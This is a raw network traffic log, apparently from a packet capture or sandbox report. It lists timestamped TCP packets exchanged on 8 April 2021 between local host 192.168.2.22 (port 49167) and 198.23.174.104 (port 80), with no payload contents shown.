Apr 8, 2021 12:50:33.025206089 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025217056 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025230885 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025255919 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025274038 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025448084 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025449038 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025477886 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025496006 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025509119 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025520086 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025536060 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025547981 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025558949 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025576115 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025580883 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025592089 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025629044 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025629044 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025660992 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025666952 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025705099 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025717974 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025743008 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025775909 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025780916 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025801897 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025834084 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025839090 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025857925 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025871038 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025888920 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025897980 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025923967 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.026022911 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.026048899 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.026062965 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.026073933 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.026091099 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.026094913 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.026129961 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.026130915 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.026134968 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.026155949 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.026165962 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.026191950 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.026191950 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.026216030 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.026252031 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.026256084 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.026264906 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.026297092 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.026300907 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.026334047 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029284954 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029293060 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029324055 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029342890 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029366016 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029591084 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029629946 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029673100 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029709101 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029712915 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029745102 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029750109 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029777050 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029789925 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029800892 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029836893 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029840946 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029845953 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029884100 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029891014 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029922962 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029932022 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029948950 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029969931 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.029990911 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.029995918 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030010939 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030036926 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030082941 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030102015 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030136108 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030162096 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030190945 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030196905 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030221939 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030244112 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030267000 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030287981 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030359030 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030376911 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030443907 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030462027 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030468941 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030488968 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030502081 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030519962 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030596972 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030615091 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030620098 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030647039 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030683994 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030704975 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030750990 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030769110 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030781031 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030798912 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030848980 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030869007 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030884027 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030908108 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030911922 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030932903 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030934095 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.030957937 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.030958891 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031019926 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031023026 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031025887 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031044960 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031081915 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031084061 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031148911 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031172037 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031200886 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031203032 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031208992 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031224966 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031249046 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031270981 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031271935 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031275034 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031281948 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031296968 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031311035 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031347036 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031363010 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031414032 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031431913 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031459093 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031757116 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031775951 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031786919 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031805038 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031946898 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031965971 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.031979084 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.031996965 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032010078 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032027960 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032033920 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032052994 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032073021 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032089949 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032095909 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032123089 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032128096 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032145023 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032195091 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032215118 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032232046 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032249928 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032255888 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032273054 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032286882 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032305002 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032311916 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032327890 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032341003 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032358885 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032879114 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032905102 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032910109 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032932997 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.032944918 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032955885 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.032984972 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033004045 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033035994 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033055067 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033103943 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033123970 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033128023 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033144951 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033250093 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033271074 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033272982 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033292055 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033296108 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033318996 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033319950 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033339024 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033477068 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033503056 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033534050 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033585072 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033623934 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033627033 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033660889 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033734083 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033756971 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033775091 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033786058 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.033948898 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.033993006 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.034039021 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.034064054 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.034080029 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.034096003 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.034126043 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.034163952 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.034235954 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.034261942 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.034324884 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.034332037 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.034348965 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.034404039 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.045352936 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.137727022 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.137780905 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.137830973 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.137866974 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.137872934 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.137906075 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.137908936 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.137913942 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.137938976 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.137957096 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.137969971 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.137990952 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138004065 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138022900 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138027906 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138046980 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138051033 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138068914 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138083935 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138103962 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138108969 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138125896 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138133049 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138159990 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138164043 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138165951 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138210058 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138230085 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138241053 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138259888 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138267994 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138288975 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138293982 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138312101 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138319016 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138334036 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138341904 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138351917 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138379097 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138382912 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138412952 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138418913 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138448000 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138452053 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138480902 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138487101 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138506889 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138519049 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138530016 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138534069 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138557911 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138567924 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138581038 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.138596058 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.138608932 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.139926910 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144108057 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144140959 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144170046 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144207001 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144228935 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144263029 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144268990 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144283056 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144298077 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144301891 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144328117 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144345045 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144351959 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144370079 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144373894 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144392014 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144397974 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144414902 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144423962 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144439936 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144449949 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144467115 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144471884 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144488096 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144495010 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144510984 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144514084 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144530058 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144534111 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144561052 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144567013 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144571066 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144581079 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144598007 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144618034 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144654036 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144696951 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144718885 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144733906 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144742966 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144752979 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144776106 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144778013 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144799948 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144814014 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144821882 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144826889 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144854069 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144855022 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144900084 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144903898 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144931078 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144936085 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144953012 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.144968987 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.144978046 CEST	80	49167	198.23.174.104	192.168.2.22
